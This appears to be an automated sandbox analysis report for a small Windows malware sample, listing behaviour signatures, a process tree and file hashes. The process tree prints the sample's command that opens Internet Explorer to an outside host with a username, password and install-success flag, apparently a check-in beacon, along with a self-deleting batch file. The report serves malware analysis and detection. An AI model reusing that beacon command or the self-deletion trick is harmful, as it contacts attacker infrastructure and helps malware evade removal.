Analysis

  • max time kernel
    136s
  • max time network
    134s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    23/08/2024, 01:37

General

  • Target

    b9dcc3abd13c8d61680d8e37e04d02aa_JaffaCakes118.exe

  • Size

    2KB

  • MD5

    b9dcc3abd13c8d61680d8e37e04d02aa

  • SHA1

    a79d5fb0d96a67e16d8cbca3c4c5c9595aac571d

  • SHA256

    ea9bd7ba8ff95ea3042f1ca280e7768c39bd2b5b383b276df79b55d31dcb602e

  • SHA512

    42e6541783fce7411ad9b6e839bab6658220c054f7c51b3da3efe3c49bddc5165b205864e0961c9d503eb0277359df109f253b3d0106acbd5dac5bac8e03a4cf

Score
7/10

Malware Config

Signatures

  • Deletes itself 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b9dcc3abd13c8d61680d8e37e04d02aa_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\b9dcc3abd13c8d61680d8e37e04d02aa_JaffaCakes118.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1656
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.wueiss.cn/hjy/data/user.asp?username=hjy02&password=MVFYZPLM&djwy=成功安装&op_type=add&submit=ok
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2700
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2700 CREDAT:275457 /prefetch:2
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:2756
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\kill.bat""
      2⤵
      • Deletes itself
      • System Location Discovery: System Language Discovery
      PID:2800

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    34b9bcdb8797f9019d36aef1e1926c6b

    SHA1

    e98681380eade4806be3b45c0d70849c2b2ef54d

    SHA256

    23577eb85b6c4bd1a5fa8b1bcf2fb1cce4b28675332a0e9c33531c0cf592ac75

    SHA512

    ba18ac5147d437dee702d6f3b9326510320954d9e0a563ebd527a917fc008e8cad4f549e7cc498b98ba6297e57b2c0c471fee8bc42ab2ab09df5670695da3e87

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    52e7a69b2e6e73df005d257f04cb03a2

    SHA1

    a712d6c581061f62131a5592b4c1cd79ddd48fca

    SHA256

    732ec3cdd826ab63338e20e789afc7ffdaf99e06c46c9496ae522cd143c479fe

    SHA512

    fcd415b0f389cca383abafc991f6116f612ae03d6a093df3610be53c04026ad04e0da750becf7041a00be7094890ccaff529f467dc4016aabf8f87a0f78f73f7

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    cd76d5eb87492dd4dc2bd1b58b60a641

    SHA1

    9534b6a01e9db6639652a855bd35e11bf0e69cac

    SHA256

    0979b8e3d37b707a6dc9a95be0dc06b3c76c9868626c1cf900c925769d64cf92

    SHA512

    34afc0a64d054ba56c69112b41cbf0611cb9f2323d6b5aa9e8d41ab2a45c2217b46da3623f8e17b7bc80e683358704f5a9319a0272044f0b00ceb611ea061d2e

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    d17a4a4115cc72aaa6decb429c501912

    SHA1

    c3a3730b14b147311030fc84cf7ac2ee89ccb04c

    SHA256

    ef06688e1edf6a7e5a7face64ee7e31146bd4c3905509c0a7df02a0a6c867c09

    SHA512

    12a0e56fbb3dbdc3eca3f2b01f93bcc23d6e7766508999241886b1106498206f23f051f73584e07cd571c47f6f0bc6a1ee49d9ad3fe4c315a9eb869cab5f2ae2

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    d09b4ae8a369808d92cbb98f9a520e83

    SHA1

    1750a0670572d0bf1cb8253a5cd24dbf5c721f40

    SHA256

    da268d1adc1625fb9193b9f2e619e1c155545016abfa5aad213bb880cf9ce482

    SHA512

    59090d11ba5c5bd51c98d69c89a5703b5d83363b84d26a2a751abc1c1b69c891ef91f9d574bc3d8ca848789faf63955b8ce05a717c989d40759560bed69d0bb2

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    b21ec47948744be08daf8dead3682f65

    SHA1

    04a1246880e28435b1f293dfed215227006c06f7

    SHA256

    17bcdde8eb637ee5302dab8b1876361374f9fb8885c6b0e5e13970f6a906d3a2

    SHA512

    eb7552ababdf10956bbb98fc9fee8358d406961d8d11b5eeacb0dfd9483911fc43e226bf3451c03162e5347e6ef394175e0e782cf1c6b5013b255cb25c0847fd

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    004bbbd58fa09d059150c7966b65685f

    SHA1

    b4cfacbe5bee98d5cf5cb0665fbc8e5917a2603e

    SHA256

    18e62713916b750b236e082457f669c7cecbd7cb8643c165397986fc31247643

    SHA512

    4e319edbbbee4d621c9df92b0aaf6f31e74f312795258b351aa60760d7ba6a6e4947c97db7548940f028e02c6a8bb9f61d8f7c72c55f98ec2c75a575ee57930c

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    03a17d031fd64bb379bba12bf72bdfad

    SHA1

    7523dd04bf906ca3cd2c7c7555d8b15f9134cdd4

    SHA256

    fe930d0ced27ea4a380827cf9809dea1f1c28b888bb2d006a072d2f2a4b953b4

    SHA512

    aa828b3292f6bbe621426f076fe2a89a624bf9255569f94dc30fe5e78ce17a3746b76a879ec5d1657b9e6d4c64309993fc692821980eb8a5879669db26807742

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    2a045bba121588234ad9e4b7b49e10b0

    SHA1

    b0074ca329a1c43b1834c1f04318cb73e9d27aff

    SHA256

    0a00bdff678020cd34d90ae5239eefe6a86d911b4d68d5f8ac452babefe81778

    SHA512

    7c73f0c31d03a2ad368be1047b18873bbd6c310b61573a77a7125d20426a1de2ad4c23c0f148cd9a4ea0b88b755ecbfed07c1e4b6a2ae7e1686b9d72b1853e5b

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    899494a64656ce3333a83661cafe2355

    SHA1

    b28538c2bfc0e7f772174e0e0dd99dac56fe3894

    SHA256

    86bb7999e852b2d9ea816615fff86d248f9119cd9f873da199e3a9ea49b91a64

    SHA512

    fccf70bcc5bd1b8fbc3cbe9c1abfa866d7cbf57c15d3871b1a200b9eb3658fcb80c160ff82d44b5f25bdd31223754e1bc7bdf060d2e54bd3b002d1b451a129b3

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    8b623e641fbf00421b85da22f1eaf283

    SHA1

    1d73fa16852f843dc2a967cd9b34cdaf240460d2

    SHA256

    b2e2c930acb7a92f64a25a408e0acc5fc04f0d90f4e6513901c18da29433a5a9

    SHA512

    0896312fa3f3d2ecff39ba7f54b6e01a48752de402d9e8b7675afd4be05ad83748b332ee117638674f35da1d947a3598c80d4a21ea5b2667420002ca27c55fc2

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    90d3c0c773c4e4b35dabdf18035b7711

    SHA1

    19c07a719f700b5c42a78eb6efddf390452eb752

    SHA256

    4362cfbf98924cfd8df3aaa944bce0605de2ecb299d0d6b5f77d24807adb0263

    SHA512

    19a73cd574a0c0a76cc3a5e80fc66c02e01fa6cd18f29a89a6334bcf049b7072995f6755f809a9e38a75730f7d7ee444834ad2080c9d68db040ebc76e624e5fb

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    0a744d6ab010cda4679870f263dec49e

    SHA1

    6ff1fa70fe025a6dec1f586032c7aaefa3fc5b84

    SHA256

    5d0cbd54c0511f8dbb79fef473c02d50a17ba9fac5c68045bd6df5ba61c8cae6

    SHA512

    64f0c3d715ccb04d36edcca48aeb7978e168605974f7625dbfe1e5088a1fbf2a614bc8f08eba10a8c3117cece9979998a95fae91d752fef7d50bb27800574da1

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    50b289ce22a808e13668eb192ea14a3c

    SHA1

    cbcecb41334ca5dda57641de9da6c1fc81ec36c3

    SHA256

    b7c9b5827a7884e35a7d8bc1c1941293c7b80e11ecdfc4508a559d36e3bcbfee

    SHA512

    08baa309d3ad2d148b610de23bfa6c0fa831d2c7de0ccd45973fb807e46ecd43faedaecacb682b3ddf3e7ee42f0413d46bd53c98b862ab94b33361993916c7ce

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    9450e06af2141e0981603dfc42a73c77

    SHA1

    9d5311695092a296d2b6a46e26de25e5f0be9b73

    SHA256

    57e156350b5c56d0ab65c6072b7446e5937f6ffb8dad4647b25a702c20c162da

    SHA512

    96f6a132622cf9dde7f5291111d01f84292355404890cf89232e90102b94a1ab757d7816446e6588e33be770a3ce8bdce454e65c62e3ede1eb901ec0c6674f56

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    b244f40ce087ade5177d695577523222

    SHA1

    6b0c198007db40caf027e41db13cfff57f15ea71

    SHA256

    f2804008f3013e9f1c8c8e9b2c788387809c8e016e7dcff61644360e2ac6748f

    SHA512

    eac739e84ee9a0ee5dc5430d6db7a8abb1482514bcd306fb60fe6e8dd72875843fabe512f4c07432c8da3ea1825cf20d961b75cd61e3a9085251050d3cec204a

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    978894e9f7503c29ce5d7ee0e25d4954

    SHA1

    e50fb1e212e22505150fe1cced0e4d08f818d046

    SHA256

    f0a979bb9170f85c067e73fee219f809f60ad57f1e33e4f7a1551f578dd2a73a

    SHA512

    13e2d117902b17c904eb6e8023d910677ca340c804f2b08dd2de96b3cc766c7cd0a7001cfe8a4f09e5b93e0dac4813faa19bd25a557ce0871ff40da3ef50ca31

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    b348af0eb3ee2030436783c416c09f93

    SHA1

    6afb73799c70a4ea4800b1e35afd36525f31def5

    SHA256

    81802d9009fd4b0648aada0b1d45b40873f42f8c19ceb4a1a12f14cadafd6f06

    SHA512

    16d9cbfe384b018405a7500a04a95342507c5be7c089d93be35a39a2fa6578a7a6de9a5315539ca33f962d2dbaa38b6e6b0eacc5f5a8eb1cd424ad9335548ea5

  • C:\Users\Admin\AppData\Local\Temp\CabBECF.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\TarBF7E.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • C:\Users\Admin\AppData\Local\Temp\kill.bat

    Filesize

    218B

    MD5

    fa62449f3abc8752153ff582f6ceb4e9

    SHA1

    7e3c11d8435204f946db9371dadda25bdbbf1058

    SHA256

    69729a3f79cc0612f44b89381f61f71686ade10defc46997dcffc7b126b003f2

    SHA512

    b2f2d059c5811201aa8445c834a9b28bf74626f6a17bc5cfb6f5de2c21cd428c7ad06afed3382279b9764cf75c4fdc705ee0788e5948e1d62a51cb1e25e38d32

  • memory/1656-9-0x0000000000400000-0x0000000000406000-memory.dmp

    Filesize

    24KB